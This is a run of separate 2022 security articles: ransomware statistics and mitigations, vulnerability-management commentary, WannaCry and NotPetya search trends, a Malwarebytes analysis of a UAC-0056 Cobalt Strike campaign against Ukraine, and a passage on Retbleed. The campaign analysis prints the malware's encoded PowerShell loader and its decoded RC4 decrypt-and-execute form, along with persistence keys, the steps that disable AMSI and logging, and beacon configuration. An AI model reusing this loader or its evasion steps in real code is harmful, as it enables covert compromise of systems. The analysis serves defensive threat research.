2022 is shaping up to be another banner year for ransomware, which continued to dominate the threat landscape in Q2. 
The post Ransomware rolled through business defenses in Q2 2022 appeared first on Malwarebytes Labs.

Ransomware has given security professionals a headache for the better part of a decade. Fast forward to 2022, and the headache has become a migraine—not just for IT teams but business owners, employees, and customers as well. Over the last three months, ransomware gangs have increased the pressure by multiplying in number and unleashing targeted attacks on vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion.

The supply chain, already stretched to a breaking point, suffered additional misfortunes across multiple industries, from agriculture and manufacturing to technology and utilities. Governments, nonprofits, and schools—some forced to close their doors—didn’t escape unscathed. And the carnage was not confined to US borders, though it was by far the most affected country. Germany, the UK, and Italy also registered high ransomware tallies.

To understand how we got here, let’s first take a closer look at recent statistics on the top ransomware variants, countries and industries attacked. Next, we’ll evaluate noteworthy attacks month-by-month before discussing whether it’s worth paying the ransom in today’s climate. In addition, we’ll examine current trends to deduce what businesses might expect from ransomware authors in the months to come. Finally, we’ll review mitigation tactics that businesses of all sizes can adopt to keep ransomware at bay.

****Top ransomware variants****

LockBit was the most widely-distributed ransomware in March, April, and May 2022, and its total of 263 spring attacks was more than double the number of Conti, the variant in second place. However, the Conti gang suffered severe setbacks in the wake of its public declaration of support for Russia and subsequent data leaks of its source code, and the group quietly dismantled operations while keeping up appearances. Three groups alleged to be linked to Conti’s disbandment—Black Basta, ALPHV, and Hive—eventually overtook Conti in ransomware distribution by the end of May.

Here’s how the top variants ranked by total number of spring incidents:

1.  LockBit: 263
2.  Conti: 127
3.  Black Cat/ALPHV: 68
4.  Hive: 40
5.  Black Basta: 33\*

\*Black Basta launched in April, so its tally is one month less than the others.

****Top countries****

The United States was by far the most attacked country this spring, with 290 reported ransomware events. Its cyberattack count far surpassed the next two highest countries (Germany and the UK) combined, with the former reporting 48 ransomware incidents and the latter 41.

Here are the top five countries impacted by ransomware this spring:

1.  United States: 290
2.  Germany: 48
3.  UK: 41
4.  Italy: 38
5.  Canada: 31

****Top industries****

Perhaps it might be easier to create a list of industries that weren’t impacted by ransomware in Q2. Services—a catch-all term encompassing service-providing sectors such as transportation, travel, finance, health, education, information, government, and a myriad of other industries—was targeted the most by cybercriminals. However, in a clear bid for the supply chain jugular, threat actors also zeroed in on manufacturing, technology, utilities (including oil), and agriculture.

In fact, the FBI warned the food and agriculture sector (specifically farmers’ co-ops) this April about potential ransomware attacks during critical planting and harvesting seasons that could result in operational disruptions to the supply chain, which could then lead to food shortages. The previous month, HP Hood Dairy suffered a ransomware attack, which was likely behind its Lactaid brand going missing from shelves in early April.

Here’s how the top five industries ranked by number of ransomware attacks this spring:

1.  Services: 171
2.  Manufacturing: 76
3.  Technology: 65
4.  Utilities: 61
5.  Retail: 50

****Noteworthy March attacks****

March was a chaotic month featuring headline-grabbing attacks on tech giants Microsoft and Samsung, as well as automotive titan Toyota, which was forced to halt production across its Japanese plants after a key supplier was compromised. Lapsus$, the criminal enterprise behind Samsung’s infiltration, leaked 190 GB of data and source code reportedly from the Galaxy smart phone, as well as confidential information from Qualcomm.

The most active ransomware variant was LockBit, which registered 97 attacks in March alone, including a hit on tire company Bridgestone Americas that caused the organization to disconnect many of its Latin and North American manufacturing and retreading facilities from the corporate network.

Hive ransomware, a RaaS launched in June 2021, was also busy in March. The group attacked Romania’s petroleum provider, demanding a multi-million dollar ransom and forcing the company to shut down its websites and Fill&Go services at gas stations. Hive also compromised a California healthcare nonprofit later in the month.

****Noteworthy April attacks****

April stood out as the month when three new dangerous RaaS variants, thought to be Conti-affiliated were introduced: Onyx, Mindware, and Black Basta. Conti still had some bite left, however, with 43 reported attacks that month. Among them were industrial giant Parker Hannifin and American automotive tools manufacturer Snap-on, as well as Panasonic’s Canadian operations, from which Conti claimed to have stolen 2.8 GB of data.

Newcomer Black Basta, who carried out 11 attacks in April, made headlines when it compromised German wind turbine company Deutsche Windtechnik and the American Dental Association, which was forced to take affected systems offline. The organization suffered disruptions to online services, telephones, email, and webchat, as well as personal data leaked on its members.

Onyx ransomware, meanwhile, launched with only six attacks in April, but they were deadly. The malware doesn’t just lock up systems and data—it destroys any file larger than 2 MB. Mindware also made a splashy April debut with double extortion threats and 13 attacks, including a Minnesota-based mental health provider from which it pilfered sensitive patient information.

The award for most data stolen in April goes to the Stormous criminal gang, who bragged about an assault resulting in 161 GBs exfiltrated from Coca-Cola without the company knowing. Reports say the Russian-linked threat actors later put it up for sale for 16 million Bitcoin or $640,000.

To add insult to injury, REvil (aka Sodonokibi) appeared to return in April with new payloads and a fresh leak blog featuring a mixture of recent and old victims. The threat actors have been linked to numerous high-profile ransomware incidents, including arguably the biggest ransomware attack of all time—a supply-chain hit on Kaseya in July 2021 believed to have affected over 1,000 businesses.

****Noteworthy May attacks****

In May, government and education were some of the hardest hit verticals, while attacks on Indian airline SpiceJet and farming equipment maker AGCO made the most headlines globally. Black Basta was reportedly behind the AGCO infiltration, which disrupted production of harvesters, tractors, and other business operations. The Austrian state of Carinthia also made the news when the BlackCat gang disrupted their systems and demanded a ransom of $5 million.

Despite strong evidence of a slow-down in activity—just 12 reported incidents in May—Conti made a showy display with a massive, sustained attack against Costa Rica that resulted in its new president declaring a state of emergency on May 8. On the same day, an inflammatory message appeared on the group’s leak site alongside 672 GB of stolen data. In response, the US Department of State offered a $10 million reward for information leading to individuals holding key leadership positions within Conti.

In other May government attacks, the town of Quincy, Massachusetts, had its information service systems compromised. They paid $500,000 for a decryption key and an additional $150,000 for security consultants to assist with the investigation. A ransomware attack in New Jersey’s Somerset County disrupted services and forced employees to shut down computers and create temporary Gmail accounts to ensure the public could still email key departments. The attack marked the 22nd US state or local government to be hit by ransomware in 2022, according to analysts at Recorded Future.

In education, several colleges and K–12 districts were crippled by ransomware. Kellogg Community College in Michigan was forced to cancel classes and close campuses due to a ransomware attack. On May 13, Lincoln College in Illinois permanently closed its doors after 157 years due to the combined effects of the pandemic and a major ransomware incident—a first in ransomware history.

Not to be outdone, LockBit set a steady pace in May with 73 attacks. Thought to have strong ties with Russia, the cybercriminals compromised the Bulgarian Refugee Agency and threatened to release sensitive files. Nearly 230,000 Ukrainian refugees have entered Bulgaria since the start of the war. LockBit was also behind May strikes against electronics manufacturer Foxcomm, the Rio de Janeiro finance department, and one of the largest library services in Germany.

****New ransomware trends****

In recent months, cybercriminals have upped the ransomware ante with further developments in functionality, sophistication, and distribution techniques. As a combined result of the increase in big game hunting (BGH) and remote/hybrid work, threat actors have been encountering ever more complex security infrastructures and a wider variety of devices and platforms.

To penetrate and encrypt as many systems as possible, some threat groups have started writing ransomware code using cross-platform programming languages like Python, Rust, or Golang. This allows the malware to run on different combinations of operating systems and architectures. Both BlackCat and Conti affiliates have been observed distributing versions of their variants for Linux as well as Windows. Developing in a cross-platform language also makes analyzing the malware more difficult for security researchers.

In attack methods, ransomware authors—while still favoring good old-fashioned social engineering—have started backing away from phishing emails and leaning toward exploiting server, software, and operating system vulnerabilities instead. In fact, unpatched vulnerabilities are now the primary vector for ransomware attacks, according to a report by IT software company Ivanti.

Last year, Ivanti identified 65 new vulnerabilities known to have been exploited in ransomware attacks—a number representing nearly one quarter of all vulnerabilities used to drop the threat in the history of its existence. There were 39 percent more vulnerabilities used for ransomware attacks in 2021 than in the previous year, and 2022 is shaping up to be even more tumultuous. From January to May 2022, 22 new vulnerabilities associated with ransomware were found, and all but one are considered critical or high-risk.

What do these trends mean for the year ahead? Cross-platform ransomware has the potential to infect even more systems, some (like Linux) that lack robust anti-ransomware protections. Coding ransomware in this way could eventually take down all endpoints, including IoT and personal devices, in a single blow, rendering recovery operations incredibly difficult—if not outright impossible. Automatic data backups to offsite and/or segmented servers will be key in keeping businesses operational in case of breach.

Meanwhile, ransomware operators are moving to swiftly weaponize vulnerabilities. The average time to exploit is now within eight days of the vulnerability being published by a vendor. That means organizations will need to prioritize patching vulnerabilities associated with ransomware, as well as according to criticality and against their own risk appetites.

****To pay or not to pay****

As ransomware attacks have evolved in sophistication and impact, so too have their ransom demands. Ransoms were 36 percent higher in 2021 than in 2020 at an average of $6.1 million. Yet by spring of 2022, many ransomware authors had whittled away at any sense of trust businesses might have had that by paying the ransom, they’ll receive what’s promised.

In 2020, gangs such as Conti, REvil, and Maze published stolen data even if the ransom was paid. Others took the ransom and never returned the files. By 2021, only 8 percent of those who paid the ransom actually got their files back. At that point, 83 percent of successful attacks featured double or triple extortion schemes. According to a Proofpoint study, 60 percent of participants who opted to negotiate with their attackers ended up having to pay ransom more than once.

By spring 2022, ransomware gangs showed no sense of responsibility toward their victims. RaaS operations, which now dominate the ransomware landscape, tend to be short-lived (therefore reputation isn’t important), and renegade affiliates often fail to follow their operator’s directions. When ransom demands bust the budget, data is not returned or is leaked regardless, and paying up puts a target on your back, it’s probably best to pocket the millions and get to work on mitigations.

****Ransomware mitigations****

To stave off potential future attacks—especially in an era of political and economical instability—the following actions are recommended:

*   Implement regular backups of all data to be stored as air-gapped, password-protected copies offline. Make sure these copies are not accessible for modification or deletion from any system where the original data lives.
*   Administer network segmentation so that all machines on your network are not accessible from every other machine.
*   Install updates/patches to operating systems, software and firmware as soon as they are released.
*   Install and regularly update endpoint security software on all devices—including those used in work-from-home capacities—and enable real-time detection.
*   Audit user accounts with administrative privileges and configure access controls with the least privilege in mind. Implement multifactor authentication (MFA) for additional credential security.
*   Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor for any unusual activity.

For ransomware reviews by the Malwarebytes Threat Intel team, check out the following:

*   March ransomware review
*   April ransomware review
*   May ransomware review
*   June ransomware review

Be ready and resilient in advance of ransomware attacks. Learn more.

_Malwarebytes’ CEO Marcin Kleczynski started the Byte into Security newsletter to provide readers with candid takeaways—and practical solutions—for the most pressing security topics of the day._ _Subscribe to get the CEO perspective sent straight to your inbox_!

Ransomware rolled through business defenses in Q2 2022

Most organizations are flying blind when remediating vulnerabilities. We lack the tooling to secure software fast enough. We need a new approach to vulnerability management now.

In a world increasingly dependent on technology, software sprawl is growing. Companies use custom-built software, open source software, and products from third-party providers when building applications. Through this software supply chain, the digital attack surface expands. Each software dependency can also open it up to potential attack as bugs are found in all types of software that malicious actors can exploit. Certain attacks in the headlines in the last year, including those that impacted SolarWinds and Kaseya, highlight the fragility of the software supply chain and the far-reaching implications if the supply chain is exploited.

Now the federal government is paying attention to software threats. It is now a requirement for companies that want to contract with government agencies to maintain a software bill of materials (SBOM) in order to have a clear and complete inventory of the software an organization has throughout its environment.

In tandem with understanding one's software environment is also the need to find vulnerabilities within that environment. Vulnerability management tools look for specific vulnerabilities and are segmented to specific areas within the various environments where software resides. Some scan for CVEs in the infrastructure, some on containers, and some in OSS libraries.

But there are severe limitations to both of these tools. While SBOM tools have been developed, unfortunately, most require a lot of manual work and are limited to specific parts of the software stack and environment. And while vulnerability scanners may locate bugs, they do not give security teams context that is specific to their own individual environments about how much risk each flaw might pose.

The result is most organizations are still flying blind when it comes to remediating vulnerabilities. Static SBOMs only reveal a point in time view of the software environment. And vulnerability scanners only offer limited information about flaws, with no real "action plan" on how to prioritize and remediate them other than CVE scores, which are of little value in many cases. Tech debt grows, and the attack surface is still massive.

In this software-driven world, we lack the tooling to release secure software — or secure released software — fast enough.

**We Need a New Approach to Vulnerability Management**

With software outpacing the ability of traditional vulnerability management to scan everything, a new approach is needed. The answer? Tools and strategy that allow security and development professionals to see all software across the stack and understand risk holistically.

Here's why.

1.  **Understanding what you have is not enough.** More software and more vulnerabilities are creating huge backlogs for IT. That's why we not only need tools to detect the vulnerabilities associated with the software, but also tools to prioritize these vulnerabilities and understand what matters. Rezilion's research shows that only a small percentage of discovered vulnerabilities are loaded into memory and therefore, exploitable, reducing patching backlogs by up to 85%.
2.  **Context is key.** You must be able to figure out which software and applications will be most affected by vulnerabilities and whether the vulnerability poses a high risk. You also need to know what the attacker will achieve by exploiting the vulnerability and gaining access to your network, and what the impact will be.
3.  **Knowing what vulnerabilities matter doesn't mean you know how to fix them effectively**. Furthermore, remediation has also become more complex with many stakeholders and even more vulnerabilities.

To solve this, security and dev teams need intelligence on how to handle every vulnerability, what packages to upgrade, and to make sure this information is passed to the right stakeholders to make it easy for them to apply patches. This is the future of vulnerability management.

**Detect. Prioritize. Remediate: The New Road Map for Software Attack Surface Management**

The path forward in vulnerability management includes three key stops: Detect. Prioritize. Remediate. If these components sound familiar to you, it's because they're part of a framework called "Attack-Surface Management" that has been successfully applied to assets and networks. This is the strategy needed to expand software security beyond its traditional boundaries of simply scanning for vulnerabilities.

You can arrive at the stops with three capabilities:

**Detect:** A dynamic SBOM to see in real-time into the software environment and identify flaws.

**Prioritize:** A vulnerability prioritization tool to understand which bugs pose an actual risk.

**Remediate:** An automated vulnerability remediation that fixes the critical vulnerabilities.

**Does Your Vulnerability Management Strategy Include the Three Key Elements?**

Ask yourself whether your organization is protected with the traditional approach to vulnerability management using manual tools to find vulnerable software components. Most organizations today are fighting battle that fails to reduce the rapidly growing software attack surface. The best way forward is one that not only identifies bugs but also prioritizes and fixes them quickly and efficiently. That's why new tools and approaches are required in order to truly manage vulnerabilities in today's constantly growing attack surface.

**About the Author**

    

Liran Tancman, CEO and co-founder of Rezilion, is one of the founders of the Israeli cyber command and spent a decade in Israel's intelligence corps. In 2013, Liran co-founded CyActive, a company that built a technology capable of predicting how cyber threats could evolve and offer future-proof security. Liran served as CyActive's CEO and led it from its inception to its acquisition by PayPal in 2015. Following the acquisition, Liran headed PayPal's global Security Products Center responsible for developing cutting-edge technologies to secure PayPal's customers.

The 3 Critical Elements You Need for Vulnerability Management Today

Two mostly defunct threats — WannaCry and NonPetya — top the list of ransomware searches, but does that mean they are still causing problems?

Five years ago, two ransomware programs, WannaCry and NonPetya, used self propagation to spread quickly across the globe, infecting hundreds of thousands of computers, shutting down business operations, and causing billions in damages.

The two programs, often referred to as worms, have refused to die. In a back-of-the-napkin analysis of search terms for common ransomware programs, Canadian IT services and support firm Firewall Technical found that WannaCry and Petya claimed the top and third spot on a list of most searched-for ransomware — at 6,000 and 1,800 monthly searches, respectively — with Ryuk beating out Petya to claim the No. 2 slot, according to data collected from keyword-search tools commonly used by search engine optimization (SEO) firms.

With the Petya searches, it is likely that people are equating Petya with the more damaging NotPetya. People searching for information about Petya are more than likely looking for how to deal with NotPetya, as it has far more effect on everyone, the company says.

Certain other keyword phrases — such as "_X_ decryptor" and "_X_ ransomware removal" — highlighted different trends: "Locky ransomware removal" had a slight lead in monthly searches, and "Cerber decryptor" was the second most common after WannaCry. Arguably, searches for decryptors and removal information are more indicative of infections, according to the support firm's experts.

"Although reports of infections are the best way of detecting threats, monitoring search engine user behavior can give us a clue into both trends and the infections that users are dealing with," a Firewall Technical spokesperson said.

    

Source: Firewall Technical (https://www.firewalltechnical.com)

The fact that two worm-like programs continue to have a long-term impact on systems is not surprising. In its threat update on ransomware, security software firm WithSecure found that WannaCry still accounted for 53% of all detections in 2021 — more than the next four ransomware families combined.

The programs typically embed themselves inside organizations that do not have good visibility into the state of their systems and lack the ability to regularly patch systems, says Neeraj Singh, research and development manager at WithSecure.

"Most of the upstream ... cases that we receive come from the organizations \[that\] do not have the infrastructure to upgrade \[or\] patch operating systems," he says.

Luckily, the worms' impacts are blunted at present. Following a successful infection, WannaCry attempts to connect to a URL and, if successful, does not encrypt the files on the system — a behavior that researcher Marcus Hutchins used to create a kill switch that continues to work to this day.

While NotPetya has no kill switch, current volumes of infections are low enough to make tracking them difficult, according to WithSecure. To date, no new versions of either program have been observed since 2017, the company said.

If WannaCry and NotPetya follow the trajectory of past worm-like threats, they are unlikely to fade away quickly. Four years after the Slammer worm started spreading, for example, the so-called "flash" worm remained the most common network threat. More than a decade after the Conficker worm started spreading in 2008, endpoint security firms continue to block hundreds of thousands of intrusion attempts by infected systems every year.

The data collected by Firewall Tactical also shows the limits of relying on search terms for threat intelligence. Searches for "WannaCry ransomware" were only a sliver of the 201,000 hits in May 2017, when the crypto ransomware worm first appeared, suggesting that the long tail will continue to cause headaches for IT administrators. The 6,000 searches is also a far cry from the more general query for the keyword "WannaCry," which topped 3.4 million that month.

Internet Searches Reveal Surprisingly Prevalent Ransomware

While the war in Ukraine still rages, various threat actors continue to launch cyber attacks against its government entities. In this blog we review the latest campaign from the UAC-0056 threat group.
The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

_This blog was authored by Roberto Santos and Hossein Jazi_

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted the government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.

In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.

**Different themes, same techniques**

Since the publication of our blog post _There’s a Go Elephant in the room_, we have tracked several new samples as can be seen in the timeline below:

Figure 1: Relations between different UAC-0056 attributed samples

Let’s dig further into those relationships. UA-CERT has attributed the document named “_Information on the availability of **vacancies** and their staffing.xls_” to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:

Figure 2: Detail of Vacancies and GoElephant dropper macros

In the most recent attack reported by UA-CERT (_**Humanitarian catastrophe** of Ukraine since February 24, 2022.xls_) we see an almost identical macro to the one used in another decoy document called _Help Ukraine.xls_:

Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros

The **Help Ukraine** lure, to our knowledge, has never been publicly documented before:

Figure 4: Help Ukraine lure used in late July

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack:

Figure 5: Similarities between different versions

Also, in the past we have found comments regarding to a domain named ExcelVBA\[.\]ru. This document was contacting a suspiciously similar domain named excel-vba\[.\]ru.

Figure 6: Similarities between different versions (2)

Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:

> _On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine_!
> 
> Translation of original email sent to victims

We will focus our analysis on these 3 newer templates. Exact names and paths are from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (_Information on the availability of vacancies and their staffing.xls_). The analysis is still valid for the others, while minor changes exist between samples.

**write.bin**

The document will download an executable file named _write.bin_. Other attacks following the same scheme used different names for this file, including _Office.exe_, _baseupd.exe_ and _DataSource.exe_. The file is slightly obfuscated, and performs the following actions:

**Establishing persistence**

After some antidebug tricks, the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Check License is used to establish persistence. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update Checker, is checked first because that was the key used by previous versions of the malware.

Figure 7: Run key for persistence

**Dropping next stage**

Next step is dropping a file in _C:\\ProgramData\\TRYxaEbX_.  This file will be used later.

Figure 8: Powershell commandline shown in IDA Pro

The payload will execute the following powershell Base64 encoded command:

JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA

Figure 9: Write executable creating the previous detailed powershell command

The chunk before is Base64 encoded; which decodes to:

$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEbX");

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};

$C = (& $A $A1 $B1);

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);

$E = $E -Split [Environment]::NewLine;

foreach($EE in $E){iex $($EE+";");};

In short the file dropped in _C:\ProgramData\TRYxaEbX_ will be decrypted using CmAJngvdDmiTjLxN as key using the RC4 algorithm. This next PowerShell script will look like:

Figure 10: Decoded PowerShell stage

Here we can see some of the actions that will be taken:

*   Disable script logging
*   Disable Module Logging
*   Disable Transcription
*   Disable AMSI protection

After this step, another Base64 payload is decoded and executed:

Figure 11: Final PowerShell script

**Cobalt Strike payload deployed**

As it can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:

**BeaconType**                    – HTTPS

**Port**                              – 443

**SleepTime**                       – 30000

**PublicKey\_MD5**              – defb5d95ce99e1ebbf421a1a38d9cb64

**C2Server**                         – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/

**UserAgent**                       – Mozilla/5.0\_Frsg\_stredf\_o21\_rutyyyrui\_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko\_10984gap

**HttpPostUri**                    – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/

**Watermark**                      – 1580103824

By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.

**Attacker probes the sandbox**

At the time of writing, malicious C&C servers seem to be down. However, on July 5 we saw active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the content of several folders.

We were able to decode the network communications using Didier Steven’s excellent collection of Cobalt Strike tools.

Figure 12: Cobalt Strike communication decoded

We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.

**Attribution to UAC-0056**

Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056.

Signatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key defb5d95ce99e1ebbf421a1a38d9cb64), may be used to connect the attack to other groups. For instance, the public key should be unique among deployments, according to the CobaltStrike documentation.

However, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed in this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and used the same private key as others, making attribution harder.

Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.

**IOCs**

**Malicious Excel documents (Help Ukraine template)**

fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3  
c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a  
1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532  
258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0  
e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386  
ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff  
eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df

**Malicious Excel documents (Humanitarian template)**

024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1  
14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea  
474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d

**Payloads**

0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470  
aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a  
fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346  
501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff

**Cobalt Strike beacon and payloads**

136.144.41\[.\]177  
syriahr\[.\]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/  
syriahr\[.\]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/  
skreatortemp\[.\]site  
imolaoggi\[.\]eu

Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign

The exploit can leak password information and other sensitive material, but the chipmakers are rolling out mitigations.

Some microprocessors from Intel and AMD are vulnerable to a newly discovered speculative execution attack that can covertly leak password data and other sensitive material, sending both chipmakers scrambling once again to contain what is proving to be a stubbornly persistent vulnerability.

Researchers from ETH Zurich have named their attack Retbleed because it exploits a software defense known as retpoline, which chipmakers introduced in 2018 to mitigate the harmful effects of speculative execution attacks. Speculative execution attacks, also known as Spectre, exploit the fact that when modern CPUs encounter a direct or indirect instruction branch, they predict the address for the next instruction they’re about to receive and automatically execute it before the prediction is confirmed. Spectre works by tricking the CPU into executing an instruction that accesses sensitive data in memory that would normally be off-limits to a low-privileged application. Retbleed then extracts the data after the operation is canceled.

Is It a Trampoline or a Slingshot?

Retpoline works by using a series of return operations to isolate indirect branches from speculative execution attacks, in effect erecting the software equivalent of a trampoline that causes them to safely bounce. Stated differently, a retpoline works by replacing indirect jumps and calls with returns, which many researchers presumed weren’t susceptible. The defense was designed to counter variant 2 of the original speculative execution attacks from January 2018. Abbreviated as BTI, the variant forces an indirect branch to execute so-called gadget code, which in turn creates data to leak through a side channel.

Some researchers have warned for years that retpoline isn’t sufficient to mitigate speculative execution attacks because the returns retpoline used were susceptible to BTI. Linux creator Linus Torvalds famously rejected such warnings, arguing that such exploits weren’t practical.

The ETH Zurich researchers have conclusively shown that retpoline is insufficient for preventing speculative execution attacks. Their Retbleed proof-of-concept works against Intel CPUs with the Kaby Lake and Coffee Lake microarchitectures as well as with AMD Zen 1, Zen 1+, and Zen 2 microarchitectures.

“Retpoline, as a Spectre-BTI mitigation, fails to consider return instructions as an attack vector,” researchers Johannes Wikner and Kaveh Razavi wrote. “While it is possible to defend return instructions by adding a valid entry to the RSB return stack buffer before executing the return instruction, treating every return as potentially exploitable in this way would impose a tremendous overhead. Previous work attempted to conditionally refill the RSB with harmless return targets whenever a perCPU counter that tracks the call stack depth reaches a certain threshold, but it was never approved for upstream. In the light of Retbleed, this mitigation is being re-evaluated by Intel, but AMD CPUs require a different strategy.”

In an email, Razavi explained it this way:

_Spectre variant 2 exploited indirect branches to gain arbitrary speculative execution in the kernel. Indirect branches were converted to returns using the retpoline to mitigate Spectre variant 2._

_Retbleed shows that return instructions unfortunately leak under certain conditions similar to indirect branches. These conditions are unfortunately common on both Intel (Skylake and Skylake-based) and AMD (Zen, Zen+ and Zen2) platforms. This means that retpoline was unfortunately an inadequate mitigation to begin with._

In response to the research, both Intel and AMD advised customers to adopt new mitigations that the researchers said will add as much as 28 percent more overhead to operations.

Retbleed can leak kernel memory from Intel CPUs at about 219 bytes per second and with 98 percent accuracy. The exploit can extract kernel memory from AMD CPUs with a bandwidth of 3.9 kB per second. The researchers said that it’s capable of locating and leaking a Linux computer’s root password hash from physical memory in about 28 minutes when running the Intel CPUs and in about six minutes for AMD CPUs.

Retbleed works by using code that essentially poisons the branch prediction unit that CPUs rely on to make their guesses. Once the poisoning is complete, this BPU will make mispredictions that the attacker can control.

“We found that we can inject branch targets that reside inside the kernel address-space, even as an unprivileged user,” the researchers wrote in a blog post. “Even though we cannot access branch targets inside the kernel address-space—branching to such a target results in a page fault—the Branch Prediction Unit will update itself upon observing a branch and assume that it was legally executed, even if it's to a kernel address.”

